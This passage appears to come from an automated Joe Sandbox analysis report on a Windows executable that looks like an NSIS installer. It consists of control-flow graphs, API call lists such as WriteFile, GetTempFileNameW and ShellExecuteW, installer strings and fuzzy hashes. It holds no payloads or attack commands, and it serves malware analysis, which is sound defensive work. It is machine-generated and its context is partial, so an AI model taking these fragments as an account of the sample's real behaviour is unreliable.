                                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                          • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                          • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                        • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$QuiBookstore
                                                        • API String ID: 4286501637-2375099690
                                                        • Opcode ID: 2ab80255bde4e5d1782dd9130ab292fdec73e4a72f9567b243a786bab725b233
                                                        • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                        • Opcode Fuzzy Hash: 2ab80255bde4e5d1782dd9130ab292fdec73e4a72f9567b243a786bab725b233
                                                        • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 428 403587-4035d5 GetTickCount GetModuleFileNameW call 405e50 431 4035e1-40360f call 406009 call 406751 call 406009 GetFileSize 428->431 432 4035d7-4035dc 428->432 440 403615 431->440 441 4036fc-40370a call 4032d2 431->441 433 4037b6-4037ba 432->433 443 40361a-403631 440->443 447 403710-403713 441->447 448 4037c5-4037ca 441->448 445 403633 443->445 446 403635-403637 call 403336 443->446 445->446 452 40363c-40363e 446->452 450 403715-40372d call 403368 call 403336 447->450 451 40373f-403769 GlobalAlloc call 403368 call 40337f 447->451 448->433 450->448 478 403733-403739 450->478 451->448 476 40376b-40377c 451->476 454 403644-40364b 452->454 455 4037bd-4037c4 call 4032d2 452->455 460 4036c7-4036cb 454->460 461 40364d-403661 call 405e0c 454->461 455->448 464 4036d5-4036db 460->464 465 4036cd-4036d4 call 4032d2 460->465 461->464 475 403663-40366a 461->475 472 4036ea-4036f4 464->472 473 4036dd-4036e7 call 407281 464->473 465->464 472->443 477 4036fa 472->477 473->472 475->464 481 40366c-403673 475->481 482 403784-403787 476->482 483 40377e 476->483 477->441 478->448 478->451 481->464 484 403675-40367c 481->484 485 40378a-403792 482->485 483->482 484->464 486 40367e-403685 484->486 485->485 487 403794-4037af SetFilePointer call 405e0c 485->487 486->464 488 403687-4036a7 486->488 491 4037b4 487->491 488->448 490 4036ad-4036b1 488->490 492 4036b3-4036b7 490->492 493 4036b9-4036c1 490->493 491->433 492->477 492->493 493->464 494 4036c3-4036c5 493->494 494->464
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 00403598
                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                          • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                          • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                        • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe,C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                        • String ID: "C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe"$C:\Users\user\Desktop$C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                        • API String ID: 4283519449-1183765325
                                                        • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                        • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                                        • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                        • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 495 40337f-403396 496 403398 495->496 497 40339f-4033a7 495->497 496->497 498 4033a9 497->498 499 4033ae-4033b3 497->499 498->499 500 4033c3-4033d0 call 403336 499->500 501 4033b5-4033be call 403368 499->501 505 4033d2 500->505 506 4033da-4033e1 500->506 501->500 507 4033d4-4033d5 505->507 508 4033e7-403407 GetTickCount call 4072f2 506->508 509 403518-40351a 506->509 510 403539-40353d 507->510 521 403536 508->521 523 40340d-403415 508->523 511 40351c-40351f 509->511 512 40357f-403583 509->512 514 403521 511->514 515 403524-40352d call 403336 511->515 516 403540-403546 512->516 517 403585 512->517 514->515 515->505 530 403533 515->530 519 403548 516->519 520 40354b-403559 call 403336 516->520 517->521 519->520 520->505 532 40355f-403572 WriteFile 520->532 521->510 526 403417 523->526 527 40341a-403428 call 403336 523->527 526->527 527->505 533 40342a-403433 527->533 530->521 534 403511-403513 532->534 535 403574-403577 532->535 536 403439-403456 call 407312 533->536 534->507 535->534 537 403579-40357c 535->537 540 40350a-40350c 536->540 541 40345c-403473 GetTickCount 536->541 537->512 540->507 542 403475-40347d 541->542 543 4034be-4034c2 541->543 544 403485-4034bb MulDiv wsprintfW call 404f72 542->544 545 40347f-403483 542->545 546 4034c4-4034c7 543->546 547 4034ff-403502 543->547 544->543 545->543 545->544 550 4034e7-4034ed 546->550 551 4034c9-4034db WriteFile 546->551 547->523 548 403508 547->548 548->521 552 4034f3-4034f7 550->552 551->534 554 4034dd-4034e0 551->554 552->536 556 4034fd 552->556 554->534 555 4034e2-4034e5 554->555 555->552 556->521
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 004033E7
                                                        • GetTickCount.KERNEL32 ref: 00403464
                                                        • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                        • wsprintfW.USER32 ref: 004034A4
                                                        • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                        • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: CountFileTickWrite$wsprintf
                                                        • String ID: ... %d%%$P1B$X1C$X1C
                                                        • API String ID: 651206458-1535804072
                                                        • Opcode ID: 71a0af70068d15f1e2712f5ef5f0e4f02d53f291cdcd50b6d0822de58acd1dbf
                                                        • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                                        • Opcode Fuzzy Hash: 71a0af70068d15f1e2712f5ef5f0e4f02d53f291cdcd50b6d0822de58acd1dbf
                                                        • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 557 401eb9-401ec4 558 401f24-401f26 557->558 559 401ec6-401ec9 557->559 560 401f53-401f7b GlobalAlloc call 406805 558->560 561 401f28-401f2a 558->561 562 401ed5-401ee3 call 4062a3 559->562 563 401ecb-401ecf 559->563 576 4030e3-4030f2 560->576 577 402387-40238d GlobalFree 560->577 565 401f3c-401f4e call 406009 561->565 566 401f2c-401f36 call 4062a3 561->566 574 401ee4-402702 call 406805 562->574 563->559 567 401ed1-401ed3 563->567 565->577 566->565 567->562 573 401ef7-402e50 call 406009 * 3 567->573 573->576 589 402708-40270e 574->589 577->576 589->576
                                                        APIs
                                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                        • GlobalFree.KERNELBASE(0066D3E8), ref: 00402387
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: FreeGloballstrcpyn
                                                        • String ID: Exch: stack < %d elements$Pop: stack empty$QuiBookstore
                                                        • API String ID: 1459762280-3917574419
                                                        • Opcode ID: 4c8c09c83ece9067cd01ebc7f99896dd0048823aea7dafec600988da42eaf391
                                                        • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                                        • Opcode Fuzzy Hash: 4c8c09c83ece9067cd01ebc7f99896dd0048823aea7dafec600988da42eaf391
                                                        • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 592 4022fd-402325 call 40145c GetFileVersionInfoSizeW 595 4030e3-4030f2 592->595 596 40232b-402339 GlobalAlloc 592->596 596->595 597 40233f-40234e GetFileVersionInfoW 596->597 599 402350-402367 VerQueryValueW 597->599 600 402384-40238d GlobalFree 597->600 599->600 603 402369-402381 call 405f51 * 2 599->603 600->595 603->600
                                                        APIs
                                                        • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                        • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                        • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                        • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                                          • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                        • GlobalFree.KERNELBASE(0066D3E8), ref: 00402387
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                        • String ID:
                                                        • API String ID: 3376005127-0
                                                        • Opcode ID: 8c326ffdf613bec965b24eefbd291de90d56381beca0eea403caad45aa1d2aeb
                                                        • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                                        • Opcode Fuzzy Hash: 8c326ffdf613bec965b24eefbd291de90d56381beca0eea403caad45aa1d2aeb
                                                        • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 608 402b23-402b37 GlobalAlloc 609 402b39-402b49 call 401446 608->609 610 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 608->610 615 402b70-402b73 609->615 610->615 616 402b93 615->616 617 402b75-402b8d call 405f6a WriteFile 615->617 618 4030e3-4030f2 616->618 617->616 622 402384-40238d GlobalFree 617->622 622->618
                                                        APIs
                                                        • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                        • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                        • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                        • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                        • String ID:
                                                        • API String ID: 2568930968-0
                                                        • Opcode ID: a43f8298630559bd8253c369c7e0cb3863940d209ccab43e1d506770e08af364
                                                        • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                                        • Opcode Fuzzy Hash: a43f8298630559bd8253c369c7e0cb3863940d209ccab43e1d506770e08af364
                                                        • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 625 405e7f-405e8b 626 405e8c-405ec0 GetTickCount GetTempFileNameW 625->626 627 405ec2-405ec4 626->627 628 405ecf-405ed1 626->628 627->626 630 405ec6 627->630 629 405ec9-405ecc 628->629 630->629
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 00405E9D
                                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                        Strings
                                                        • "C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe", xrefs: 00405E88
                                                        • nsa, xrefs: 00405E8C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: CountFileNameTempTick
                                                        • String ID: "C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe"$nsa
                                                        • API String ID: 1716503409-600155708
                                                        • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                        • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                                        • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                        • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 717 4021b5-40220b call 40145c * 4 call 404f72 ShellExecuteW 728 402223-4030f2 call 4062a3 717->728 729 40220d-40221b call 4062a3 717->729 729->728
                                                        APIs
                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                          • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                          • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                        • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                        Strings
                                                        • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                        • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                        • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                        • API String ID: 3156913733-2180253247
                                                        • Opcode ID: a6f9f0949098482436c6c9f8cce42b162511fb53d9db31c2e6f8192b5b466978
                                                        • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                                        • Opcode Fuzzy Hash: a6f9f0949098482436c6c9f8cce42b162511fb53d9db31c2e6f8192b5b466978
                                                        • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 737 4078c5-4078cb 738 4078d0-4078eb 737->738 739 4078cd-4078cf 737->739 740 407aeb-407aff 738->740 741 407bad-407bba 738->741 739->738 743 407b01-407b17 740->743 744 407b19-407b2c 740->744 742 407be7-407beb 741->742 745 407c4a-407c5d 742->745 746 407bed-407c0c 742->746 747 407b33-407b3a 743->747 744->747 750 407c65-407c68 745->750 751 407c25-407c39 746->751 752 407c0e-407c23 746->752 748 407b61-407b64 747->748 749 407b3c-407b40 747->749 748->750 753 407b46-407b5e 749->753 754 407ccd-407cd4 749->754 758 407350 750->758 759 407cec 750->759 755 407c3c-407c43 751->755 752->755 753->748 757 407cdd-407cea 754->757 760 407be1-407be4 755->760 761 407c45 755->761 762 407cef-407cf6 757->762 763 407357-40735b 758->763 764 40749b-4074b6 758->764 765 40746d-407471 758->765 766 4073ff-407403 758->766 759->762 760->742 768 407cd6 761->768 769 407bc6-407bde 761->769 763->757 771 407361-40736e 763->771 764->740 772 407c76-407c7d 765->772 773 407477-40748b 765->773 774 407409-407420 766->774 775 407c6d-407c74 766->775 768->757 769->760 771->759 776 407374-4073ba 771->776 772->757 777 40748e-407496 773->777 778 407423-407427 774->778 775->757 780 4073e2-4073e4 776->780 781 4073bc-4073c0 776->781 777->765 782 407498 777->782 778->766 779 407429-40742f 778->779 783 407431-407438 779->783 784 407459-40746b 779->784 787 4073f5-4073fd 780->787 788 4073e6-4073f3 780->788 785 4073c2-4073c5 GlobalFree 781->785 786 4073cb-4073d9 GlobalAlloc 781->786 782->764 789 407443-407453 GlobalAlloc 783->789 790 40743a-40743d GlobalFree 783->790 784->777 785->786 786->759 791 4073df 786->791 787->778 788->787 788->788 789->759 789->784 790->789 791->780
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
